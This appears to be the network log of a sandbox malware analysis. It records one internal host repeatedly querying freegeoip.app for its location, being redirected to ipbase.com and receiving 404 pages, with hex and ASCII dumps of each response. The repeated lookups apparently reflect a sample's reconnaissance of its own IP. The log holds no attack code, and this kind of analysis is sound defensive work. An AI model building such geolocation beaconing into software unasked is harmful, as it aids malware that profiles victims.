                                      2024-09-06 23:47:06 UTC737INHTTP/1.1 404 Not Found
                                      Date: Fri, 06 Sep 2024 23:47:06 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Age: 30232
                                      Cache-Control: public,max-age=0,must-revalidate
                                      Cache-Status: "Netlify Edge"; hit
                                      Vary: Accept-Encoding
                                      X-Nf-Request-Id: 01J74VQZB0JK42WEQKAE0QYVXS
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OGH9z3Oazcl8kTG3xkdmnqlu%2FbyjJ36%2FtKPgCmbObjnXq2fnPeaPaifCz41PpWbhSFxirjyVnXve7fqxFEiJryUsS7c7nVNxOkXHOMTevgpDRZmTmxt%2FR%2FGiid1P"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8bf2579bac7ac331-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-09-06 23:47:06 UTC632INData Raw: 63 30 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 0a 20 20 20 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d
                                      Data Ascii: c09<!DOCTYPE html><html> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no"> <title>Page Not Found</title> <link href='https://fonts.googleapis.com
                                      2024-09-06 23:47:06 UTC1369INData Raw: 6e 67 3a 20 30 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 32 70 78 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 34 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 2e 6d 61 69 6e 20 7b 0a 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0a 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 20 20 20 20 20 20 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 20 63 6f 6c 75 6d 6e 3b 0a 20 20 20 20 20 20 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 68 65 69 67 68 74 3a
                                      Data Ascii: ng: 0; } h1 { margin: 0; font-size: 22px; line-height: 24px; } .main { position: relative; display: flex; flex-direction: column; align-items: center; justify-content: center; height:
                                      2024-09-06 23:47:06 UTC1087INData Raw: 20 20 20 20 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 30 30 37 30 36 37 22 20 64 3d 22 4d 31 31 2e 39 39 39 38 38 33 36 2c 34 2e 30 39 33 37 30 38 30 33 20 4c 38 2e 35 35 38 30 39 35 31 37 2c 37 2e 34 33 32 39 34 39 35 33 20 43 38 2e 32 33 35 33 31 34 35 39 2c 37 2e 37 34 36 31 31 32 39 38 20 38 2e 32 33 35 33 31 34 35 39 2c 38 2e 32 35 33 38 38 37 33 36 20 38 2e 35 35 38 30 39 35 31 37 2c 38 2e 35 36 36 39 33 37 36 39 20 4c 31 32 2c 31 31 2e 39 30 36 32 39 32 31 20 4c 39 2e 38 34 31 38 37 38 37 31 2c 31 34 20 4c 34 2e 32 34 32 30 38 35 34 34 2c 38 2e 35 36 36 39 33 37 35 31 20 43 33 2e 39 31 39 33 30 34 38 35 2c 38 2e 32 35 33 38 38 37 31 39 20 33 2e 39 31 39 33 30 34 38 35 2c 37 2e 37 34 36 31 31 32 38 31 20 34 2e 32 34 32 30 38 35 34 34 2c 37 2e 34 33 32
                                      Data Ascii: <path fill="#007067" d="M11.9998836,4.09370803 L8.55809517,7.43294953 C8.23531459,7.74611298 8.23531459,8.25388736 8.55809517,8.56693769 L12,11.9062921 L9.84187871,14 L4.24208544,8.56693751 C3.91930485,8.25388719 3.91930485,7.74611281 4.24208544,7.432
                                      2024-09-06 23:47:06 UTC6INData Raw: 31 0d 0a 0a 0d 0a
                                      Data Ascii: 1
                                      2024-09-06 23:47:06 UTC5INData Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2192.168.2.549715188.114.97.3443
                                      TimestampBytes transferredDirectionData
                                      2024-09-06 23:47:21 UTC67OUTGET /xml/ HTTP/1.1
                                      Host: freegeoip.app
                                      Connection: Keep-Alive
                                      2024-09-06 23:47:21 UTC635INHTTP/1.1 301 Moved Permanently
                                      Date: Fri, 06 Sep 2024 23:47:21 GMT
                                      Content-Type: text/html
                                      Content-Length: 167
                                      Connection: close
                                      Cache-Control: max-age=3600
                                      Expires: Sat, 07 Sep 2024 00:47:21 GMT
                                      Location: https://ipbase.com/xml/
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=d81diPdFWJXxNQnm5RkxCZBWPdqJtP5QNNVn3xMlILClnro7dOhPsEXDI4cqMxmRd57nTlNwVWCZjnmB4G8blHlD9Xyj863GqdvFzofDBIk0CW1W3RUIa%2BY7O6hW7W7j"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8bf257fd29727277-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-09-06 23:47:21 UTC167INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                      Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3192.168.2.549716104.21.85.189443
                                      TimestampBytes transferredDirectionData
                                      2024-09-06 23:47:22 UTC64OUTGET /xml/ HTTP/1.1
                                      Host: ipbase.com
                                      Connection: Keep-Alive
                                      2024-09-06 23:47:22 UTC734INHTTP/1.1 404 Not Found
                                      Date: Fri, 06 Sep 2024 23:47:22 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Age: 0
                                      Cache-Control: public,max-age=0,must-revalidate
                                      Cache-Status: "Netlify Edge"; fwd=miss
                                      Vary: Accept-Encoding
                                      X-Nf-Request-Id: 01J74VRFEC8WNH5W8D6W334D23
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mlu64iqkg565SokK38lt2HAqjAxdn0RvPpUwp8SPjOAQvO%2Fs1zq4Nf2JxX669auaw4j02nCq%2ByI3l0Ci8LKqs4Od9CT619XVkOWmGaymh1IZhyrc5I78bByczYx6"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8bf25802bb2872bc-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-09-06 23:47:22 UTC635INData Raw: 63 30 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 0a 20 20 20 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d
                                      Data Ascii: c0a<!DOCTYPE html><html> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no"> <title>Page Not Found</title> <link href='https://fonts.googleapis.com
                                      2024-09-06 23:47:22 UTC1369INData Raw: 20 30 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 32 70 78 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 34 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 2e 6d 61 69 6e 20 7b 0a 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0a 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 20 20 20 20 20 20 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 20 63 6f 6c 75 6d 6e 3b 0a 20 20 20 20 20 20 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30
                                      Data Ascii: 0; } h1 { margin: 0; font-size: 22px; line-height: 24px; } .main { position: relative; display: flex; flex-direction: column; align-items: center; justify-content: center; height: 10
                                      2024-09-06 23:47:22 UTC1085INData Raw: 20 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 30 30 37 30 36 37 22 20 64 3d 22 4d 31 31 2e 39 39 39 38 38 33 36 2c 34 2e 30 39 33 37 30 38 30 33 20 4c 38 2e 35 35 38 30 39 35 31 37 2c 37 2e 34 33 32 39 34 39 35 33 20 43 38 2e 32 33 35 33 31 34 35 39 2c 37 2e 37 34 36 31 31 32 39 38 20 38 2e 32 33 35 33 31 34 35 39 2c 38 2e 32 35 33 38 38 37 33 36 20 38 2e 35 35 38 30 39 35 31 37 2c 38 2e 35 36 36 39 33 37 36 39 20 4c 31 32 2c 31 31 2e 39 30 36 32 39 32 31 20 4c 39 2e 38 34 31 38 37 38 37 31 2c 31 34 20 4c 34 2e 32 34 32 30 38 35 34 34 2c 38 2e 35 36 36 39 33 37 35 31 20 43 33 2e 39 31 39 33 30 34 38 35 2c 38 2e 32 35 33 38 38 37 31 39 20 33 2e 39 31 39 33 30 34 38 35 2c 37 2e 37 34 36 31 31 32 38 31 20 34 2e 32 34 32 30 38 35 34 34 2c 37 2e 34 33 32 39 34 39
                                      Data Ascii: <path fill="#007067" d="M11.9998836,4.09370803 L8.55809517,7.43294953 C8.23531459,7.74611298 8.23531459,8.25388736 8.55809517,8.56693769 L12,11.9062921 L9.84187871,14 L4.24208544,8.56693751 C3.91930485,8.25388719 3.91930485,7.74611281 4.24208544,7.432949
                                      2024-09-06 23:47:22 UTC5INData Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      4192.168.2.549718188.114.97.3443
                                      TimestampBytes transferredDirectionData
                                      2024-09-06 23:47:24 UTC67OUTGET /xml/ HTTP/1.1
                                      Host: freegeoip.app
                                      Connection: Keep-Alive
                                      2024-09-06 23:47:24 UTC643INHTTP/1.1 301 Moved Permanently
                                      Date: Fri, 06 Sep 2024 23:47:24 GMT
                                      Content-Type: text/html
                                      Content-Length: 167
                                      Connection: close
                                      Cache-Control: max-age=3600
                                      Expires: Sat, 07 Sep 2024 00:47:24 GMT
                                      Location: https://ipbase.com/xml/
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cHLH5ptsf92bq4oGA9yWlNjg43RPPEwipd90VT7Sm1yXeP5qUjQO2KvE20c%2B%2F778vbdth2YC%2BHXLxd6cJqQ12gt3QSdLkmfwwnqLrnx1D3PdNTt8bpe%2FoNw68a%2FYSVd0"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8bf2580ecc0941d9-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-09-06 23:47:24 UTC167INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                      Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5192.168.2.549719104.21.85.189443
                                      TimestampBytes transferredDirectionData
                                      2024-09-06 23:47:25 UTC64OUTGET /xml/ HTTP/1.1
                                      Host: ipbase.com
                                      Connection: Keep-Alive
                                      2024-09-06 23:47:25 UTC736INHTTP/1.1 404 Not Found
                                      Date: Fri, 06 Sep 2024 23:47:25 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Age: 7649
                                      Cache-Control: public,max-age=0,must-revalidate
                                      Cache-Status: "Netlify Edge"; hit
                                      Vary: Accept-Encoding
                                      X-Nf-Request-Id: 01J74VRJ1JENJ0XXRKFJVTF69K
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cYYLk7oTpOnWbR7VjQlNU77WC2L8I%2BuPk0ArvBDJLkWXGA%2FTGQzxBEJ0DeAfFbB%2FiArNtAK8h2f9sV1FwuJV9yqNTgORkx0F0%2BLJM6hq4RMNbQS1WLzjPdTWidIQ"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8bf258135cb678dc-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-09-06 23:47:25 UTC633INData Raw: 63 30 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 0a 20 20 20 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d
                                      Data Ascii: c0a<!DOCTYPE html><html> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no"> <title>Page Not Found</title> <link href='https://fonts.googleapis.com
                                      2024-09-06 23:47:25 UTC1369INData Raw: 67 3a 20 30 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 32 70 78 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 34 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 2e 6d 61 69 6e 20 7b 0a 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0a 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 20 20 20 20 20 20 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 20 63 6f 6c 75 6d 6e 3b 0a 20 20 20 20 20 20 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 68 65 69 67 68 74 3a 20
                                      Data Ascii: g: 0; } h1 { margin: 0; font-size: 22px; line-height: 24px; } .main { position: relative; display: flex; flex-direction: column; align-items: center; justify-content: center; height:
                                      2024-09-06 23:47:25 UTC1087INData Raw: 20 20 20 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 30 30 37 30 36 37 22 20 64 3d 22 4d 31 31 2e 39 39 39 38 38 33 36 2c 34 2e 30 39 33 37 30 38 30 33 20 4c 38 2e 35 35 38 30 39 35 31 37 2c 37 2e 34 33 32 39 34 39 35 33 20 43 38 2e 32 33 35 33 31 34 35 39 2c 37 2e 37 34 36 31 31 32 39 38 20 38 2e 32 33 35 33 31 34 35 39 2c 38 2e 32 35 33 38 38 37 33 36 20 38 2e 35 35 38 30 39 35 31 37 2c 38 2e 35 36 36 39 33 37 36 39 20 4c 31 32 2c 31 31 2e 39 30 36 32 39 32 31 20 4c 39 2e 38 34 31 38 37 38 37 31 2c 31 34 20 4c 34 2e 32 34 32 30 38 35 34 34 2c 38 2e 35 36 36 39 33 37 35 31 20 43 33 2e 39 31 39 33 30 34 38 35 2c 38 2e 32 35 33 38 38 37 31 39 20 33 2e 39 31 39 33 30 34 38 35 2c 37 2e 37 34 36 31 31 32 38 31 20 34 2e 32 34 32 30 38 35 34 34 2c 37 2e 34 33 32 39
                                      Data Ascii: <path fill="#007067" d="M11.9998836,4.09370803 L8.55809517,7.43294953 C8.23531459,7.74611298 8.23531459,8.25388736 8.55809517,8.56693769 L12,11.9062921 L9.84187871,14 L4.24208544,8.56693751 C3.91930485,8.25388719 3.91930485,7.74611281 4.24208544,7.4329
                                      2024-09-06 23:47:25 UTC5INData Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6192.168.2.549720188.114.97.3443
                                      TimestampBytes transferredDirectionData
                                      2024-09-06 23:47:29 UTC67OUTGET /xml/ HTTP/1.1
                                      Host: freegeoip.app
                                      Connection: Keep-Alive
                                      2024-09-06 23:47:29 UTC641INHTTP/1.1 301 Moved Permanently
                                      Date: Fri, 06 Sep 2024 23:47:29 GMT
                                      Content-Type: text/html
                                      Content-Length: 167
                                      Connection: close
                                      Cache-Control: max-age=3600
                                      Expires: Sat, 07 Sep 2024 00:47:29 GMT
                                      Location: https://ipbase.com/xml/
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lpOaR%2BjY92Htl1y99BrjnOAxg2ZmoPr9GXqygz8aQ5n7j0tXdDdKAdFfWsdCp5%2BWK2Bbhsm76U8Gi2YF0HzbA0RlTbbNKLsk2JND8SWue%2F7Tf9%2FrnnBTelWMXyBxiBwo"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8bf2582b1f797cae-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-09-06 23:47:29 UTC167INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                      Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7192.168.2.549721104.21.85.189443
                                      TimestampBytes transferredDirectionData
                                      2024-09-06 23:47:29 UTC64OUTGET /xml/ HTTP/1.1
                                      Host: ipbase.com
                                      Connection: Keep-Alive
                                      2024-09-06 23:47:29 UTC729INHTTP/1.1 404 Not Found
                                      Date: Fri, 06 Sep 2024 23:47:29 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Age: 7
                                      Cache-Control: public,max-age=0,must-revalidate
                                      Cache-Status: "Netlify Edge"; hit
                                      Vary: Accept-Encoding
                                      X-Nf-Request-Id: 01J74VRPARXH31AY7RMNNGA7Z5
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nMpa0QTm8d32T2M72n7KvO3daFQnDDi%2BBmJNi6OTMsHAfbYfl0EsAzMVZu9VcWmEaDQi1Z7Sl0hAu30UjMTWnHwm%2FqmfL8o50CuSLdT9DGu8a2neCbu2VSXVzeie"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8bf2582ecfb00f70-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-09-06 23:47:29 UTC640INData Raw: 63 30 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 0a 20 20 20 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d
                                      Data Ascii: c0a<!DOCTYPE html><html> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no"> <title>Page Not Found</title> <link href='https://fonts.googleapis.com
                                      2024-09-06 23:47:29 UTC1369INData Raw: 20 20 20 7d 0a 0a 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 32 70 78 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 34 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 2e 6d 61 69 6e 20 7b 0a 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0a 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 20 20 20 20 20 20 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 20 63 6f 6c 75 6d 6e 3b 0a 20 20 20 20 20 20 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 76 68 3b 0a
                                      Data Ascii: } h1 { margin: 0; font-size: 22px; line-height: 24px; } .main { position: relative; display: flex; flex-direction: column; align-items: center; justify-content: center; height: 100vh;
                                      2024-09-06 23:47:29 UTC1080INData Raw: 68 20 66 69 6c 6c 3d 22 23 30 30 37 30 36 37 22 20 64 3d 22 4d 31 31 2e 39 39 39 38 38 33 36 2c 34 2e 30 39 33 37 30 38 30 33 20 4c 38 2e 35 35 38 30 39 35 31 37 2c 37 2e 34 33 32 39 34 39 35 33 20 43 38 2e 32 33 35 33 31 34 35 39 2c 37 2e 37 34 36 31 31 32 39 38 20 38 2e 32 33 35 33 31 34 35 39 2c 38 2e 32 35 33 38 38 37 33 36 20 38 2e 35 35 38 30 39 35 31 37 2c 38 2e 35 36 36 39 33 37 36 39 20 4c 31 32 2c 31 31 2e 39 30 36 32 39 32 31 20 4c 39 2e 38 34 31 38 37 38 37 31 2c 31 34 20 4c 34 2e 32 34 32 30 38 35 34 34 2c 38 2e 35 36 36 39 33 37 35 31 20 43 33 2e 39 31 39 33 30 34 38 35 2c 38 2e 32 35 33 38 38 37 31 39 20 33 2e 39 31 39 33 30 34 38 35 2c 37 2e 37 34 36 31 31 32 38 31 20 34 2e 32 34 32 30 38 35 34 34 2c 37 2e 34 33 32 39 34 39 33 36 20 4c 39
                                      Data Ascii: h fill="#007067" d="M11.9998836,4.09370803 L8.55809517,7.43294953 C8.23531459,7.74611298 8.23531459,8.25388736 8.55809517,8.56693769 L12,11.9062921 L9.84187871,14 L4.24208544,8.56693751 C3.91930485,8.25388719 3.91930485,7.74611281 4.24208544,7.43294936 L9
                                      2024-09-06 23:47:29 UTC5INData Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8192.168.2.549722188.114.97.3443
                                      TimestampBytes transferredDirectionData
                                      2024-09-06 23:47:31 UTC67OUTGET /xml/ HTTP/1.1
                                      Host: freegeoip.app
                                      Connection: Keep-Alive
